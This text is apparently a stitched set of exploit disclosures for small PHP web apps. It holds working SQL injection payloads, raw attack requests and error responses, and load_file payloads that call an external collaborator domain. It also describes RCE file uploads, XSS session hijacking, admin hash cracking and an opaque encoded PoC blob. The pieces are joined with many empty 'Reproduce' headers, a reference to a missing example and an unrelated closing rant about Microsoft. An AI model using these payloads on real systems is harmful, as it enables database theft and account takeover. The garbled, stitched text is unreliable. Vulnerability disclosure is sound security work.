CONCLUSION: This pseudo developer must be stopped immediately.
MySQL Request:
GET /nia_munoz_monitoring_system/my_classmates.php?id=189' HTTP/1.1
Host: 192.168.1.2
Cookie: PHPSESSID=k6gnppcljj6b7vs8ua3tdefmkt
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/nia_munoz_monitoring_system/dashboard_student.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0
MySQL Response:
HTTP/1.1 200 OK
Date: Fri, 03 Dec 2021 17:54:59 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5946
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html class="no-js">
<head>
<title>NIA Project Monitoring System</title>
<meta name="description" content="Learning Management System">
<meta name="keywords" conte ...[SNIP]...
<ul id="da-thumbs" class="da-thumbs">
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''189'' order by lastname' at line 4
Reproduce:
Proof and Exploit:
M0r3:
Proof and Exploit:
Technical Analysis
CVE-2021-37808
Vendor
Description:
The searchtitle parameter from News Portal Project 3.1 appears to be vulnerable to SQL injection attacks.
The payload ‘+(select load_file(’\\wddcdzjvtmxtfkwxdw5gwdmxpovhj99x00osbiz7.nu11secur1tycollaborator.net\lni’))+’ was submitted in the searchtitle parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can retrieve sensitive information for all accounts of this system, and he can manipulate them!
STATUS: Critical and awful.
Reproduce:
Proof and Exploit:
Technical Analysis
CVE-2021-41492
Software
Description:
The username parameter from Sourcecodester Simple Cashiering System (POS) 1.0 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the username parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can retrieve sensitive information from the database for all users, and also the administrator account!
MySQL Request:
POST /cashiering/Actions.php?a=login HTTP/1.1
Host: 192.168.10.63
Origin: http://192.168.10.63
Cookie: PHPSESSID=bgtkft2eqoj6s4ajhp414erka3
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://192.168.10.63/cashiering/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 37

username=tralala'&password=@32e23eq3r
MySQL Response:
HTTP/1.1 200 OK
Date: Wed, 01 Dec 2021 12:06:18 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 521
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>: SQLite3::query(): Unable to prepare statement: 1, unrecognized token: "5a72f9fa6edacd9d71b9e2dc9d1a9ecc" in <b>C:\xampp\htdocs\cashiering\Actions.php</b> on line <b>1 ...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to a member function fetchArray() on bool in C:\xampp\htdocs\cashiering\Actions.php:15
Stack trace:
#0 C:\xampp\htdocs\cashiering\Actions.php(233): Actions->login()
#1 {main}
thrown in <b>
Reproduce:
Proof and exploit:
BR nu11secur1ty
Technical Analysis
CTMS
Vendor
Description:
The parameters username and contactno from COVID 19 Testing Management System (CTMS) 1.0 are vulnerable to Remote Code SQL injection attacks.
Test REQUESTS: Payloads 27325265’ or 8079=8079— and 35638130’ or 9157=9162—.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The attacker can execute a Remote Code Injection to override the current password for the admin account directly from the broadcast networks!
Status Critical and awful.
BR nu11secur1ty
Reproduce:
Proof:
Technical Analysis
CVE-2021-41648
Vendor
Software
Description:
The p parameter of the PuneethReddyHC online-shopping-system-advanced 1.0 appears to be vulnerable to SQL injection attacks.
The payload (select load_file ('\\\\grb7dmacp8fse7awai6uedfhi8o2cz0q2et1jp8.nu11secur1tycollaborator.net\\mpv')) was submitted in the p parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The malicious user can attack the database using four SQL injection methods (UNION query, time-based blind, error-based and boolean-based blind), then he can dump all information from the database of the app, log in to the admin account, and do malicious stuff.
Conclusion: Status Critical.
Reproduce:
Proof and Exploit:
Action:
Technical Analysis
CVE-2021-41675
Vendor
Author and redevelopment of the PoC: nu11secur1ty
First cool ;) idea: Janik Wehrli - Thank you, dear friend!
Description:
A Remote Code Execution (RCE) vulnerability exists in Sourcecodester E-Negosyo System 1.0 in /admin/produts/controller.php via the doInsert function, which validates images with getimagesize(). More about the function: https://www.php.net/manual/en/function.getimagesize.php
The attacker can upload malicious RCE files bypassing this function, and after that he can use the directory traversal method to navigate to the /uploaded_photos/ directory, which is another, actual problem of this system. Because of this problem, which is no sanitizing by the getimagesize() function on this system, the attacker can execute the malicious RCE code and then retrieve all sensitive information about the app on this server and the whole architecture of this server.
CONCLUSION: There is no proper sanitizing of the getimagesize() function, and the directory /uploaded_photos/ is not correctly protected.
Reproduce:
Proof and exploit:
Technical Analysis
CVE-2021-42671
Vendor
Description:
An RCE vulnerability exists in Engineers Online Portal 1.0 when a malicious user creates an account for a malicious purpose.
Once the user has the account, he can upload a malicious RCE exploit without any problem; there is no sanitizing.
After uploading this malicious RCE file, he can navigate by using the directory traversal method, which is another problem of this system, and then execute the malicious code. Conclusion: Status awful and critical.
Reproduce:
Proof and exploit:
Technical Analysis
CVE-2021-43141
Vendor
Description:
Cross-Site Scripting (XSS) vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the id parameter in plan_application and users_application.
The attacker can use the SQL injection authentication bypass method to log in to the admin account of the system, then exploit this account with stored XSS, and then use remote requests to hijack the PHPSESSID and exploit this account and the users in it by using a stored XSS method!
Conclusion: The status of this system is CRITICAL and awful, and its distribution must be stopped immediately!
Action:
Reproduce:
Proof and exploit:
Technical Analysis
CVE-nu11-20-100121
CVE-2021-41931
Description of vulnerability:
The Company's Recruitment Management System (by: oretnom23), in the id parameter (id=2) of the view_vacancy page, appears to be vulnerable to SQL Injection - Stealing the Password Hashes attacks.
The payloads 19424269' or '1309'='1309 and 39476597' or '2917'='2923 were each submitted in the id parameter.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Description of the exploit:
Exploit Title: Recruitment Management System is vulnerable to MySQL injection - Stealing the Password Hashes attacks.
Date: 2021-10-01
Exploit Author: nu11secur1ty
Vendor Homepage: https://www.sourcecodester.com/user/257130/activity
Software Link: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
Version: (by: oretnom23) dev
- MySQL Request:
GET /employment_application/?page=view_vacancy&id=219424269'%20or%20'1309'%3d'1309 HTTP/1.1
Host: 192.168.1.180
Cookie: PHPSESSID=oku6deve0oo3qbrbbprp5jnb6j
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/employment_application/?page=vacancy
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
- MySQL Response:
HTTP/1.1 200 OK
Date: Fri, 01 Oct 2021 09:37:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12044

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1 ...[SNIP]... <h5 class="card-title fw-bold wow">Sample Vacancy 101</h5> ...[SNIP]... <div class="fs-5 ps-4">IT Depatment</div> ...[SNIP]... <div class="fs-5 ps-4">Jr. Web Developer</div> ...[SNIP]... <span class="badge bg-success rounded-pill">3</span> ...[SNIP]... <div class="fs-6 ps-4"><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: "Open Sans", Arial, sans-serif; font-size: 14px;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin pretium vel tortor id semper. Donec ultrices sagittis euismod. Pellentesque ultrices lectus in suscipit ultricies. Morbi eget erat enim. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Mauris nec ex non lectus interdum interdum sit amet in lacus. Maecenas eu nulla nec nisi bibendum euismod in a nibh. Nullam quis gravida turpis. Donec hendrerit sagittis arcu quis mollis. Quisque pretium est in turpis pulvinar, nec pellentesque sem sagittis. Quisque ultrices molestie risus id varius. Vivamus sed efficitur erat, quis cursus massa. In in varius purus. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Quisque eget cursus nunc. Aenean semper neque velit, quis ullamcorper justo efficitur id.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: "Open Sans", Arial, sans-serif; font-size: 14px;"><b>Qualification:</b></p><ul><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: "Open Sans", Arial, sans-serif; font-size: 14px;">Qualification 1</li><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: "Open Sans", Arial, sans-serif; font-size: 14px;">Qualification 2</li><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: "Open Sans", Arial, sans-serif; font-size: 14px;">Qualification 3<br></li></ul><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: "Open Sans", Arial, sans-serif; font-size: 14px;">In ut ligula et erat ullamcorper imperdiet. Pellentesque vitae justo facilisis, gravida sapien quis, mollis urna. Proin eu aliquam justo. Cras malesuada, nunc ac varius dapibus, orci ante pretium elit, non porta augue lectus sit amet orci. Ut ac porta mauris. Donec venenatis nisi sit amet massa sollicitudin lobortis. Quisque eros lectus, blandit et dapibus eu, gravida a risus. Vivamus sodales rutrum purus ac dictum. Integer massa velit, facilisis at leo vitae, semper congue mi. Vivamus bibendum sem eget porta tristique. Nunc nisl odio, pellentesque nec pellentesque quis, consequat ut neque. Sed elementum vel augue malesuada ultrices. Nullam dapibus mattis leo vitae laoreet.</p></div> ...[SNIP]...
- PoC
r0n1n.bat
XvL5vVDYAJj4HVMbIvtHb6RMoVRD9iM5nNOr2XqhOpGam2eUj8ytNzzaJyLI+Pv0MtFALO1RllnynHT6Odr38k3iyKIyTN+FszTfPrdRuHJlBKLn79q7ClWCQwWKYtTOXSPGgaKHIyxQz6RR+8JV9FQMmUjHtus7ENGSGsbL8RJIHfCVRqH6xb8tpXPJILc4gIn7mseYxiLp8x7s5Q4QhGXnHvhrsj7lE6jqTQmphumt3gQmBvxlhQILxBKGSG5ZxoVleq4xR/aUiivIiejShajuYChPXHzDF3g/e41aX4BpHa3iQsf390FP+m+FKrpeNPSZUcQAy48EwgEdHNz04yblTBo5sS5ywV5ej+3ZmiwVALH6MSvnLG3mTqglNXSc4+/MkxxmuPrn0Xbe5EZnuGjZTAnWFqfzQJjwy3A8gI2AQWH+RAR2CdWCRzr6hB0rFYJlPrFOKWAgpPB92HfUsQ==
Decrypting the password
The password is based on the PHP md5() function. So, the MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123.
Reproduce:
Proof:
- Music: UKF
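The "MD5 reverse" step above is a wordlist lookup: once the id parameter injection has dumped the users table, an unsalted md5() hash is only as strong as the password behind it. The following is an added example, not the post's r0n1n.bat PoC and not code from the application: the lookup carried out against the hash quoted in the post, extended to a whole dumped table, next to the salted, iterated hash the application should have stored instead. The wordlist and the second dumped row are constructed for the demo.

```python
"""Added example: reversing an unsalted MD5 password hash from a dumped users
table, and the storage format that would have made the dump useless.
Not the original post's PoC; wordlist and extra rows are constructed."""
import hashlib
import hmac
import os

DUMPED_HASH = "0192023a7bbd73250516f069df18b500"   # the admin hash quoted in the post
WORDLIST = ["password", "123456", "admin", "letmein", "admin123", "qwerty"]  # constructed


def reverse_md5(hex_digest, wordlist):
    """Dictionary attack on an unsalted MD5 hex digest. Without a salt, one
    pass over the wordlist (or one precomputed table) serves every user."""
    target = hex_digest.strip().lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            return candidate
    return None


def crack_all(rows, wordlist):
    """rows: iterable of (username, md5_hex) as dumped via the injection.
    Returns {username: password} for every hash found in the wordlist."""
    found = {}
    for username, digest in rows:
        password = reverse_md5(digest, wordlist)
        if password is not None:
            found[username] = password
    return found


def hash_password(password, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256 (600k is the OWASP cheat-sheet count for
    this construction). A fresh random salt per user means equal passwords
    give different strings, so a shared lookup table is impossible, and the
    iteration count makes each guess hundreds of thousands of times more
    expensive than one MD5."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    dump = [("admin", DUMPED_HASH), ("staff", "f" * 32)]   # constructed second row
    print("cracked:", crack_all(dump, WORDLIST))
    stored = hash_password("admin123")
    print("stored :", stored)
    print("same password, second hash differs:", stored != hash_password("admin123"))
    print("verify :", verify_password("admin123", stored), verify_password("admin124", stored))
```

Note that a stronger hash does not fix the injection itself; it limits what the dump is worth. The query behind `page=view_vacancy&id=` still needs a bound parameter (see the login example earlier on this page), and the admin password still needs to be something that is not in every wordlist.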
Whatever. Obviously, you don't understand.
Yesterday I found people who are using exactly this version without any updates, for their special purpose. By the way, this version is NOT old :D Microsoft just doesn't give a shit about their clients, they have a lot of money. This is so stupid, to deprecate an OS which is so young because you cannot fix one stupid sanitizing error, ok! So, please bro... Stop writing bullshit and trying to explain to me things which you don't understand! By the way, there are no issues or problems as described in CVE-2022-21907, and there never have been, this is a ridiculous experiment of Microsoft. ;) So. Love and peace!
BR =)